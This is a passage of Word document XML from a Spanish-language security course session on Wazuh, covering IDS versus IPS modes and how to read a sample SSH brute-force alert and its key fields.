          <w:p w14:paraId="2F3C6AC8" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F6000"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Diferencia entre IDS e IPS en el contexto de Wazuh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AC9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Por defecto Wazuh opera como IDS — detecta y alerta pero no bloquea. Esto es equivalente al modo IDS que aprendiste en la Sesión 6.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6ACA" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Con Active Response activado, Wazuh opera como IPS — detecta y actúa automáticamente. Este es el paso que requiere tuning previo para evitar bloquear tráfico legítimo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6ACB" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>La misma regla que en Sesión 6 aplica aquí: siempre desplegar en modo IDS primero, hacer tuning, y solo entonces activar la respuesta activa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6ACD" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6ACE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>5. Anatomía de una alerta de Wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6ACF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Saber leer una alerta de Wazuh es la habilidad más práctica de esta sesión. Cada alerta tiene una estructura estándar con campos que te dicen exactamente qué pasó, cuándo, dónde, quién lo hizo y qué tan grave es.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6AD0" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="6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121D" w14:paraId="2F3C6AF2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="444444"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6AD1" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># Ejemplo de alerta completa — intento de brute force SSH detectado:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AD2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AD3" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  "timestamp": "2026-04-22T02:16:44.123+0000",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AD4" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  "rule": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AD5" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "id": "5710",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AD6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "level": 10,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AD7" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "description": "sshd: Attempt to login using a non-existent user",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AD8" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "groups": ["syslog", "sshd", "authentication_failed"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AD9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "mitre": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6ADA" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      "tactic": ["Credential Access"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6ADB" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      "technique": ["Brute Force"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6ADC" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      "id": ["T1110"]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6ADD" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6ADE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6ADF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  "agent": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE0" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "id": "001",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE1" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "name": "servidor-bd",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "ip": "192.168.20.10"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE3" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE4" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  "data": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE5" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "srcip": "192.168.10.5",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "dstuser": "admin",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE7" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "program_name": "sshd"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE8" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AE9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  "full_log": "Apr 22 02:16:44 servidor-bd sshd[1234]: Invalid user admin from 192.168.10.5"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AEA" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AEB" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AEC" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># Cómo leer esta alerta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AED" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># rule.id 5710     → qué regla se activó (SSH login fallido)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AEE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># rule.level 10    → severidad ALTA (escala 1-15)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AEF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># agent.name       → en qué host ocurrió (servidor-bd)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AF0" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># data.srcip       → de dónde vino el ataque (192.168.10.5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AF1" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># mitre.id T1110   → táctica MITRE: Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6AF3" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="009E121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121D" w:rsidRPr="003C1812" w14:paraId="2F3C6AFA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6AF4" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F4E79"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Los cinco campos que siempre debes revisar en una alerta</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AF5" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">rule.level — determina la urgencia. Level 10+ requiere atención inmediata. Level 7-9 requiere investigación. </w:t>
            </w:r>
            <w:r>
              <w:t>Level 1-6 es para contexto.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AF6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>agent.name / agent.ip — identifica qué host fue afectado. Prioriza servidores críticos sobre estaciones de trabajo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AF7" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>data.srcip — el origen del ataque. Si es una IP interna, indica movimiento lateral ya en progreso.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AF8" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>rule.mitre.id — la táctica MITRE. Determina en qué fase del ciclo de ataque estás y qué viene después.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AF9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>timestamp — la hora exacta. Compara con otros eventos para construir la línea de tiempo del ataque.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6AFB" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6AFC" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>6. Wazuh en la arquitectura del laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6AFD" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>En el laboratorio de esta sesión, Wazuh replica exactamente la arquitectura de un SOC empresarial real — con la ventaja de que todos los componentes corren en el aula y tú puedes ver el impacto de cada ataque en tiempo real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6AFE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="8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4760"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C6B02" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2F3C6AFF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
